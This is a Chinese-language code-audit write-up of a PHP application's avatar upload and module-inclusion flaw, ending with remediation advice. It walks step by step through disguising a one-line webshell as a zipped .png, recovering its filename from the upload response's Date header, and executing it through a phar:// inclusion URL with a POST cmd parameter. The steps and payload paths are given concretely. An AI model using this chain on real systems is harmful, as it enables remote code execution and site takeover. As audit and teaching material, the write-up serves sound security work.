我们先准备一个一句话脚本,将其后缀改为inc,然后将inc文件打包为zip,然后再将后缀改为png。 这样我们的上传文件就制作好了。 v.php-->v.inc-->v.zip-->v.png
上传文件,同时开启F12查看响应包信息,我们想要的是响应包中的DATA字段的信息。
ache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: Keep-Alive Content-Length: 0 Content-Type: text/html Date: Fri, 10 Apr 2020 13:14:12 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Keep-Alive: timeout=5, max=100 Location: edit.php Pragma: no-cache Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02 X-Powered-By: PHP/5.4.45解密时间戳
将上传响应包中的DATA字段内容,放入下列脚本中即可转换为时间戳。
<?php date_default_timezone_set('UTC'); echo strtotime('Fri, 10 Apr 2020 13:14:12 GMT'); ?> //输出结果如下: 1586524452我们可以查看uploads中的文件名,对比一下两个的时间戳。两个是相同的,当然在大多数情况下两个时间可能会存在少许的偏差,此时就我们可以通过遍历最后一位或最后两位,一般就可以找到正确的时间戳。
1586524452 u_1586524452_1.png然后我们就可以使用伪协议进行文件包含了。使用phar来打开压缩包伪图片u_1586524452_1.png,然后读取其中的1.inc文件内容。
phar://uploads/u_1586524452_1.png/1.inc访问以下链接即可解析php内容:
?module=phar://uploads/u_1586524452_1.png/v POST: cmd=phpinfo() 尝试解析phpinfo(),可以成功解析,使用shell管理工具也可以成功连接webshell,说明我们成功包含了文件。 漏洞修复由于已经规定了需要包含文件的后缀为.inc,因此可以从限制文件路径和文件名两个方面进行考虑。可以定义一个数组,只允许包含该数组内已存在的文件的内容。或者限制文件包含的路径,同样只允许包含部分路径的文件。
审计思路整理1.index.php通过传入module变量来包含.inc文件
2.使用伪协议zip://&phar://突破
3.updateAvatar.php对文件上传只进行了后缀限制,未进行上传内容检查。
4.将执行上传操作的响应时间转换为时间戳,通过遍历最后几位数字来找到上传文件名中的时间戳,获取上传文件名。
5.通过上传构造好的文件,使用phar伪协议打开并执行其中的.inc文件,当.inc的内容为PHP脚本时,即可解析php内容。